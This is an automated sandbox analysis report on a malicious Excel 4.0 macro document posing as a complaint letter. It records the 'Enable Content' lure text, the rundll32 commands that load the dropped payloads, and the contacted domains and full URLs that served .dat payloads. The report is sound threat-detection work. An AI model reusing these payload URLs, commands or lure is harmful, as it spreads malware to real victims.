Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://tasks.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://webshell.suite.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://wus2-000.contentsync.
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 159.89.174.35:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.126.100.34:443 -> 192.168.2.4:49737 version: TLS 1.2

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: Complaint_Letter_1186814227-02192021.xls Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing "' 11 from the yellow bar above Ru nDLL X 12 Rl. nDLL X 13 @ Once You have Enabl
Source: Screenshot number: 8 Screenshot OCR: Enable Editing, please click Enabl RunDLL x . 14_ from the yellow bar above -( 15 / 16" ::
Source: Screenshot number: 12 Screenshot OCR: Enable Editing, please click Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CAN
Source: Screenshot number: 12 Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19
Source: Document image extraction number: 2 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 2 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8 Screenshot OCR: Enable Editing from the yellow bar above @ Once You have Enable Editing , please click Enable Cont
Source: Document image extraction number: 8 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
Found Excel 4.0 Macro with suspicious formulas
Source: Complaint_Letter_1186814227-02192021.xls Initial sample: EXEC
Document contains embedded VBA macros
Source: Complaint_Letter_1186814227-02192021.xls OLE indicator, VBA macros: true
Yara signature match
Source: Complaint_Letter_1186814227-02192021.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engine Classification label: mal76.expl.evad.winXLS@11/8@5/6
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{9661C26F-C35F-43CF-B8D9-03EFDB338AEF} - OProcSessId.dat Jump to behavior
Source: Complaint_Letter_1186814227-02192021.xls OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso1,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso2,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso3,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso4,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso1,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso2,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso3,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\KLSD.ggsso4,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: rundll32.exe, 00000005.00000002.704945089.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.699396180.0000000000F50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.722414887.0000000000C00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.729085608.0000000004C30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.713950318.0000000000CB0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000005.00000002.704945089.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.699396180.0000000000F50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.722414887.0000000000C00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.729085608.0000000004C30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.713950318.0000000000CB0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000005.00000002.704945089.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.699396180.0000000000F50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.722414887.0000000000C00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.729085608.0000000004C30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.713950318.0000000000CB0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000005.00000002.704945089.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.699396180.0000000000F50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.722414887.0000000000C00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.729085608.0000000004C30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.713950318.0000000000CB0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Complaint_Letter_1186814227-02192021.xls, type: SAMPLE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 356762 Sample: Complaint_Letter_1186814227... Startdate: 23/02/2021 Architecture: WINDOWS Score: 76 24 Found malicious Excel 4.0 Macro 2->24 26 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->26 28 Sigma detected: Microsoft Office Product Spawning Windows Shell 2->28 30 2 other signatures 2->30 6 EXCEL.EXE 39 53 2->6         started        process3 dnsIp4 18 sportsmarquee.com 70.32.104.19, 49734, 80 GO-DADDY-COM-LLCUS United States 6->18 20 erp.demosoftware.biz 58.96.102.67, 49735, 80 EXETEL-AS-APExetelPtyLtdAU Australia 6->20 22 4 other IPs or domains 6->22 32 Document exploit detected (process start blacklist hit) 6->32 34 Document exploit detected (UrlDownloadToFile) 6->34 10 rundll32.exe 6->10         started        12 rundll32.exe 6->12         started        14 rundll32.exe 6->14         started        16 2 other processes 6->16 signatures5 process6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.126.100.34
 unknown United States
16509 AMAZON-02US false
159.89.174.35
 unknown United States
14061 DIGITALOCEAN-ASNUS false
58.96.102.67
 unknown Australia
10143 EXETEL-AS-APExetelPtyLtdAU false
203.142.76.236
 unknown Indonesia
17451 BIZNET-AS-APBIZNETNETWORKSID false
70.32.104.19
 unknown United States
398110 GO-DADDY-COM-LLCUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
parama-college.id 203.142.76.236 true
erp.demosoftware.biz 58.96.102.67 true
sportsmarquee.com 70.32.104.19 true
raivens.com 159.89.174.35 true
jayshreewoods.com 13.126.100.34 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://sportsmarquee.com/hmffuzbolyio/44250683266319400000.dat false
  • Avira URL Cloud: safe
 unknown
http://raivens.com/zdmqwymhhza/44250683266319400000.dat false
  • Avira URL Cloud: safe
 unknown
http://erp.demosoftware.biz/focahjqevd/44250683266319400000.dat false
  • Avira URL Cloud: safe
 unknown
http://jayshreewoods.com/gvazzbwlvyk/44250683266319400000.dat false
  • Avira URL Cloud: safe
 unknown